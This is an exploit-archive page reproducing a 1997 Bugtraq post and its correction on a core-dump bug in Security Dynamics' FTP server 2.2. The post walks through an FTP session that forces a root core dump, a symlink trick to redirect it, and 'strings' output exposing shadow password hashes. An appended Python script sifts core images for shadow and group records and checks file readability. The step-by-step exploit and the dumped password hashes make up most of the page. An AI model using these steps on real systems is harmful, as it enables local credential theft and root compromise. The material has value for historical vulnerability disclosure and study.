Core bug in the Security Dynamics ftp server
Description: typical core file bug
Author: sp00n <sp00n@COUPLER.300BAUD.COM>
Compromise: root (local)
Vulnerable Systems: Those running the Security Dynamics FTP server (Version 2.2). This is available at least for Solaris boxes.
Date: | 12 November 1997 |
Date: Wed, 12 Nov 1997 11:56:29 -0500
From: sp00n <sp00n@COUPLER.300BAUD.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Bug In Security Dynamics' FTP server (Version 2.2)
Hi,
This bug is similar to the Solaris and other ftp core dump bugs, slightly
different though. BTW the machine is a SPARC 20 running 2.5. You can link
files and clobber them with a core to annoy your local sysadmin or, even
better, get /etc/shadow; you get the point... anyways
220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
Name (.:joeuser): joeuser
331 Password required for mpotter.
Password:
230 User joeuser logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> user root DUMP_CORE_FTPD
331 Password required for root.
530 Login incorrect.
Login failed.
ftp> quote pasv
421 Service not available, remote server has closed connection
ftp> quit
$ ls -la core
-rw-r----- 1 root network 264656 Nov 12 11:14 core
At least it doesn't dump 666 like Solaris's in.ftpd :) But I can't read it
:(
Not too useful, you say? Welp, prior to dumping the core you should link it
to ps_data or something like that; then you will get this
lrwxrwxrwx 1 joeuser network 7 Nov 12 11:07 core -> ps_data
-rw-rw-r-- 1 root sys 264656 Nov 12 11:07 ps_data
$ file ps_data
ps_data: ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'
$ strings core | more
noaccess:*LK*:6445::::::
sp00n:o.IZGdC5eBTtKY:10175:7:28::::
root:aiqzotPNtTsI:9988::::::
user2:U6d5srjcJi/KU:9952::::::
joeuser:ktxVoVPQVIgc.:10175:7:28::::
root::0:root
other::1:
bin::2:root,daemon
sys::3:root,bin,adm
adm::4:root,daemon
uucp::5:root
Date: Wed, 12 Nov 1997 16:20:11 -0500
From: sp00n
To: BUGTRAQ@NETSPACE.ORG
Subject: correction to: Bug In Security Dynamics' FTP server (Version 2.2)
Hi,
Earlier I said:
$ ls -la core
-rw-r----- 1 root network 264656 Nov 12 11:14 core
At least it doesn't dump 666 like Solaris's in.ftpd :) But I can't read it
:(
----------------earlier---------
I can read it
$ id
uid=779(joeuser) gid=1500(network)
It dumps as root and the GID of the user, SO I CAN do a
"strings core | more" w/o having to link it to ps_data or some root-owned
file with o+r perms
Matt
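The two posts above boil down to one extraction step ("strings core | more" and pick out the shadow and group records the daemon still held in memory) and one permission question (whether the root-owned core is readable by the FTP user, either directly via the 0640/user-gid mode from the correction, or indirectly via the symlink-to-ps_data trick from the first post). The script below is an added example, not code from the original posts or from Security Dynamics: it implements a strings(1)-style scan over a core image, filters the output with regexes for the Solaris shadow(4) and group(4) record layouts, and mirrors the Unix read-permission check for both core file cases. CORE_SAMPLE is a constructed byte blob standing in for the _sdi_ftpd core; the user names, hashes and mode/uid/gid values used in the demo are placeholders, not data from the posts.

```python
"""Sift a core image for /etc/shadow- and /etc/group-style records, the way
'strings core | more' did in the posts above, and check whether a given core
file would be readable by the logged-in FTP user.

Added example, not code from the original posts.  CORE_SAMPLE is a constructed
byte blob standing in for the _sdi_ftpd core; the names and hashes in it are
placeholders, not data from the posts."""
import re
import stat

MIN_RUN = 4  # strings(1) default: printable runs of at least 4 bytes

# Solaris shadow(4): name:pw:lastchg:min:max:warn:inactive:expire:flag (8 colons)
SHADOW_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_.-]*:[^:\s]*(?::[0-9]*){7}$")
# group(4): name:pw:gid:member,member,... (3 colons)
GROUP_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_.-]*:[^:\s]*:[0-9]+:[A-Za-z0-9_.,-]*$")

# Constructed stand-in for a SPARC core image: an ELF32 MSB ET_CORE header
# fragment, the program name, then the daemon's stale read buffers.
CORE_SAMPLE = (
    b"\x7fELF\x01\x02\x01" + b"\x00" * 9 + b"\x00\x04"   # ELF32, MSB, e_type=ET_CORE
    + b"\x00\x00_sdi_ftpd\x00"                           # program name as file(1) reports it
    + b"\x00\x00noaccess:*LK*:6445::::::\n"              # shadow records still in memory
    + b"joeuser:ZZZZZZZZZZZZZ:10175:7:28::::\n"          # placeholder hash
    + b"root:YYYYYYYYYYYYY:9988::::::\n\x00"             # placeholder hash
    + b"root::0:root\nsys::3:root,bin,adm\n\x00"         # group records
    + b"\x00\x01\x02\xffABC\x00"                         # 'ABC' is too short to count
)


def printable_strings(blob: bytes, min_run: int = MIN_RUN):
    """Yield runs of at least min_run printable ASCII bytes, like strings(1).
    A newline is not printable, so each record in a buffer comes out separately."""
    run = bytearray()
    for b in blob:
        if 0x20 <= b < 0x7F:
            run.append(b)
            continue
        if len(run) >= min_run:
            yield run.decode("ascii")
        run = bytearray()
    if len(run) >= min_run:
        yield run.decode("ascii")


def sift_core(blob: bytes):
    """Return (shadow_records, group_records) found in a core image."""
    shadow, groups = [], []
    for s in printable_strings(blob):
        if SHADOW_RE.match(s):
            shadow.append(s)
        elif GROUP_RE.match(s):
            groups.append(s)
    return shadow, groups


def core_readable(mode: int, owner_uid: int, owner_gid: int, uid: int, gids) -> bool:
    """Classic Unix owner/group/other read check for a core file.
    A root-owned 0640 core whose group is the user's gid (the correction) is
    readable by that user; a 0664 root:sys ps_data (the symlink trick) is
    readable by everyone."""
    if uid == 0:
        return True
    if uid == owner_uid:
        return bool(mode & stat.S_IRUSR)
    if owner_gid in gids:
        return bool(mode & stat.S_IRGRP)
    return bool(mode & stat.S_IROTH)


if __name__ == "__main__":
    shadow, groups = sift_core(CORE_SAMPLE)
    print("shadow records:", *shadow, sep="\n  ")
    print("group records:", *groups, sep="\n  ")
    # Placeholder ids: joeuser uid 779, gid 1500, core root-owned group 1500, mode 0640
    print("0640 root:user-gid core readable:", core_readable(0o640, 0, 1500, 779, [1500]))
    # Symlink trick: core -> ps_data, which ends up 0664 root:sys
    print("0664 root:sys ps_data readable:", core_readable(0o664, 0, 3, 779, [1500]))
```

The scan deliberately keys on record shape rather than on known user names, so it also flags any passwd-style lines a daemon happened to have read; tightening SHADOW_RE to the 13-character crypt(3) hash form would cut false positives at the cost of missing locked (*LK*) and empty entries like the ones in the posts.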
This page is part of Fyodor's exploit world.